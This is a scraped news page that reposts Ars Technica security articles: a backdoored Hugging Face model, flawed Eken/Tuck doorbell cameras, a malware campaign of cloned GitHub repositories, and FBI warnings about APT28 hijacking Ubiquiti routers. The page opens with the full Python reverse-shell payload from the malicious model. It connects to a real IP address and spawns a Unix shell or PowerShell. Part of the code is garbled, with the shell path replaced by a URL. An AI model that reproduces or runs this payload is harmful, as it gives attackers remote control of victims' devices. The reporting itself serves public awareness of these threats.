RHOST = "210.117.212.93"  RPORT = 4242    from sys import platform    if platform != 'win32':      import threading      import socket      import pty      import os        def connect_and_spawn_shell():          s = socket.socket()          s.connect((RHOST, RPORT))          [os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]          pty.spawn("https://arstechnica.com/bin/sh")        threading.Thread(target=connect_and_spawn_shell).start()  else:      import os      import socket      import subprocess      import threading      import sys        def send_to_process(s, p):          while True:              p.stdin.write(s.recv(1024).decode())              p.stdin.flush()        def receive_from_process(s, p):          while True:              s.send(p.stdout.read(1).encode())        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)        while True:          try:              s.connect((RHOST, RPORT))              break          except:              pass        p = subprocess.Popen(["powershell.exe"],                            stdout=subprocess.PIPE,                           stderr=subprocess.STDOUT,                           stdin=subprocess.PIPE,                           shell=True,                           text=True)        threading.Thread(target=send_to_process, args=[s, p], daemon=True).start()      threading.Thread(target=receive_from_process, args=[s, p], daemon=True).start()      p.wait()

Hugging Face has since removed the model and the others flagged by JFrog.

Hugging Face, the GitHub of AI, hosted code that backdoored user devices Read More »

$30 doorbell cameras have multiple serious security flaws, says Consumer Reports

Amazon, doorbell camera, doorbell cameras, eken, Security, Tech, tuck, video doorbell, walmart / Paul Patrick / February 29, 2024

Video doorbell security —

Models still widely available on e-commerce sites after issues reported.

Kevin Purdy – Feb 29, 2024 11: 00 am UTC

Image showing a delivery person saying — Enlarge / Consumer Reports’ investigation suggests that, should this delivery person press and hold the bell button and then pair using Eken’s app, he could see if other delivery people get such a perfunctory response.

Eken

Video doorbell cameras have been commoditized to the point where they’re available for $30–$40 on marketplaces like Amazon, Walmart, Temu, and Shein. The true cost of owning one might be much greater, however.

Consumer Reports (CR) has released the findings of a security investigation into two budget-minded doorbell brands, Eken and Tuck, which are largely the same hardware produced by the Eken Group in China, according to CR. The cameras are further resold under at least 10 more brands. The cameras are set up through a common mobile app, Aiwit. And the cameras share something else, CR claims: “troubling security vulnerabilities.”

The pairing procedure for one of Eken's doorbell cameras, which allows a malicious actor quite a bit of leeway. — Enlarge / The pairing procedure for one of Eken’s doorbell cameras, which allows a malicious actor quite a bit of leeway.

Eken

Among the camera’s vulnerabilities cited by CR:

Sending public IP addresses and Wi-Fi SSIDs (names) over the Internet without encryption
Takeover of the cameras by putting them into pairing mode (which you can do from a front-facing button on some models) and connecting through the Aiwit app
Access to still images from the video feed and other information by knowing the camera’s serial number.

CR also noted that Eken cameras lacked an FCC registration code. More than 4,200 were sold in January 2024, according to CR, and often held an Amazon “Overall Pick” label (as one model did when an Ars writer looked on Wednesday).

“These video doorbells from little known manufacturers have serious security and privacy vulnerabilities, and now they’ve found their way onto major digital marketplaces such as Amazon and Walmart,” said Justin Brookman, director of tech policy at Consumer Reports, in a statement. “Both the manufacturers and platforms that sell the doorbells have a responsibility to ensure that these products are not putting consumers in harm’s way.”

CR noted that it contacted vendors where it found the doorbells for sale. Temu told CR that it would halt sales of the doorbells, but “similar-looking if not identical doorbells remained on the site,” CR noted.

A Walmart representative told Ars that all cameras mentioned by Consumer Reports, sold by third parties, have been removed from Walmart by now. The representative added that customers may be eligible for refunds and that Walmart prohibits the selling of devices that require an FCC ID and lack one.

Ars contacted Amazon for comment and will update this post with new information. An email sent to the sole address that could be found on Eken’s website was returned undeliverable. The company’s social media accounts were last updated at least three years prior.

Consumer Reports' researchers claim to have found JPEG file references passed in plaintext over the network, which could later be viewed without authentication in a browser. — Consumer Reports’ researchers claim to have found JPEG file references passed in plaintext over the network, which could later be viewed without authentication in a browser.

Consumer Reports

CR issued vulnerability disclosures to Eken and Tuck regarding its findings. The disclosures note the amount of data that is sent over the network without authentication, including JPEG files, the local SSID, and external IP address. It notes that after a malicious user has re-paired a doorbell with a QR code generated by the Aiwit app, they have complete control over the device until a user sees an email from Eken and reclaims the doorbell.

With a few exceptions, video doorbells and other IoT cameras tend to rely on cloud connections to stream and store footage, as well as notify their owners about events. This has led to some notable privacy and security concerns. Ring doorbells were found to be pushing Wi-Fi credentials in plaintext in late 2019. Eufy, a company that marketed its “No clouds” offerings, was found to be uploading facial thumbnails to cloud servers to send push alerts and later apologized for that and other vulnerabilities. Camera provider Wyze recently disclosed that, for the second time in five months, images and video feeds were accidentally available to the wrong customers following a lengthy outage.

Listing image by Amazon/Eken

$30 doorbell cameras have multiple serious security flaws, says Consumer Reports Read More »

GitHub besieged by millions of malicious repositories in ongoing attack

Biz & IT, GitHub, repositories, Security, supply chain attack / Paul Patrick / February 29, 2024

GitHub is struggling to contain an ongoing attack that’s flooding the site with millions of code repositories. These repositories contain obfuscated malware that steals passwords and cryptocurrency from developer devices, researchers said.

The malicious repositories are clones of legitimate ones, making them hard to distinguish to the casual eye. An unknown party has automated a process that forks legitimate repositories, meaning the source code is copied so developers can use it in an independent project that builds on the original one. The result is millions of forks with names identical to the original one that add a payload that’s wrapped under seven layers of obfuscation. To make matters worse, some people, unaware of the malice of these imitators, are forking the forks, which adds to the flood.

Whack-a-mole

“Most of the forked repos are quickly removed by GitHub, which identifies the automation,” Matan Giladi and Gil David, researchers at security firm Apiiro, wrote Wednesday. “However, the automation detection seems to miss many repos, and the ones that were uploaded manually survive. Because the whole attack chain seems to be mostly automated on a large scale, the 1% that survive still amount to thousands of malicious repos.”

Given the constant churn of new repos being uploaded and GitHub’s removal, it’s hard to estimate precisely how many of each there are. The researchers said the number of repos uploaded or forked before GitHub removes them is likely in the millions. They said the attack “impacts more than 100,000 GitHub repositories.”

GitHub officials didn’t dispute Apiiro’s estimates and didn’t answer other questions sent by email. Instead, they issued the following statement:

GitHub hosts over 100M developers building across over 420M repositories, and is committed to providing a safe and secure platform for developers. We have teams dedicated to detecting, analyzing, and removing content and accounts that violate our Acceptable Use Policies. We employ manual reviews and at-scale detections that use machine learning and constantly evolve and adapt to adversarial tactics. We also encourage customers and community members to report abuse and spam.

Supply-chain attacks that target users of developer platforms have existed since at least 2016, when a college student uploaded custom scripts to RubyGems, PyPi, and NPM. The scripts bore names similar to widely used legitimate packages but otherwise had no connection to them. A phone-home feature in the student’s scripts showed that the imposter code was executed more than 45,000 times on more than 17,000 separate domains, and more than half the time his code was given all-powerful administrative rights. Two of the affected domains ended in .mil, an indication that people inside the US military had run his script. This form of supply-chain attack is often referred to as typosquatting, because it relies on users making small errors when choosing the name of a package they want to use.

In 2021, a researcher used a similar technique to successfully execute counterfeit code on networks belonging to Apple, Microsoft, Tesla, and dozens of other companies. The technique—known as a dependency confusion or namespace confusion attack—started by placing malicious code packages in an official public repository and giving them the same name as dependency packages Apple and the other targeted companies use in their products. Automated scripts inside the package managers used by the companies then automatically downloaded and installed the counterfeit dependency code.

The technique observed by Apiiro is known as repo confusion.

“Similar to dependency confusion attacks, malicious actors get their target to download their malicious version instead of the real one,” Wednesday’s post explained. “But dependency confusion attacks take advantage of how package managers work, while repo confusion attacks simply rely on humans to mistakenly pick the malicious version over the real one, sometimes employing social engineering techniques as well.”

GitHub besieged by millions of malicious repositories in ongoing attack Read More »

Hackers backed by Russia and China are infecting SOHO routers like yours, FBI warns

APT28, Biz & IT, routers, Security, volt typhoon / Rejus Almole / February 28, 2024

IDEAL HIDEOUT —

Six years on, routers remain a favorite post for concealing malicious activities.

Dan Goodin – Feb 27, 2024 8: 57 pm UTC

The FBI and partners from 10 other countries are urging owners of Ubiquiti EdgeRouters to check their gear for signs they’ve been hacked and are being used to conceal ongoing malicious operations by Russian state hackers.

The Ubiquiti EdgeRouters make an ideal hideout for hackers. The inexpensive gear, used in homes and small offices, runs a version of Linux that can host malware that surreptitiously runs behind the scenes. The hackers then use the routers to conduct their malicious activities. Rather than using infrastructure and IP addresses that are known to be hostile, the connections come from benign-appearing devices hosted by addresses with trustworthy reputations, allowing them to receive a green light from security defenses.

Unfettered access

“In summary, with root access to compromised Ubiquiti EdgeRouters, APT28 actors have unfettered access to Linux-based operating systems to install tooling and to obfuscate their identity while conducting malicious campaigns,” FBI officials wrote in an advisory Tuesday.

APT28—one of the names used to track a group backed by the Russian General Staff Main Intelligence Directorate known as GRU—has been doing that for at least the past four years, the FBI has alleged. Earlier this month, the FBI revealed that it had quietly removed Russian malware from routers in US homes and businesses. The operation, which received prior court authorization, went on to add firewall rules that would prevent APT28—also tracked under names including Sofacy Group, Forest Blizzard, Pawn Storm, Fancy Bear, and Sednit—from being able to regain control of the devices.

On Tuesday, FBI officials noted that the operation only removed the malware used by APT28 and temporarily blocked the group using its infrastructure from reinfecting them. The move did nothing to patch any vulnerabilities in the routers or to remove weak or default credentials hackers could exploit to use the devices once again to host their malware surreptitiously.

“The US Department of Justice, including the FBI, and international partners recently disrupted a GRU botnet consisting of such routers,” they warned. “However, owners of relevant devices should take the remedial actions described below to ensure the long-term success of the disruption effort and to identify and remediate any similar compromises.”

Those actions include:

Perform a hardware factory reset to remove all malicious files
Upgrade to the latest firmware version
Change any default usernames and passwords
Implement firewall rules to restrict outside access to remote management services.

Tuesday’s advisory said that APT28 has been using the infected routers since at least 2022 to facilitate covert operations against governments, militaries, and organizations around the world, including in the Czech Republic, Italy, Lithuania, Jordan, Montenegro, Poland, Slovakia, Turkey, Ukraine, the United Arab Emirates, and the US. Besides government bodies, industries targeted include aerospace and defense, education, energy and utilities, hospitality, manufacturing, oil and gas, retail, technology, and transportation. APT28 has also targeted individuals in Ukraine.

The Russian hackers gained control of devices after they were already infected with Moobot, which is botnet malware used by financially motivated threat actors not affiliated with the GRU. These threat actors installed Moobot after first exploiting publicly known default administrator credentials that hadn’t been removed from the devices by the people who owned them. APT28 then used the Moobot malware to install custom scripts and malware that turned the botnet into a global cyber espionage platform.

Hackers backed by Russia and China are infecting SOHO routers like yours, FBI warns Read More »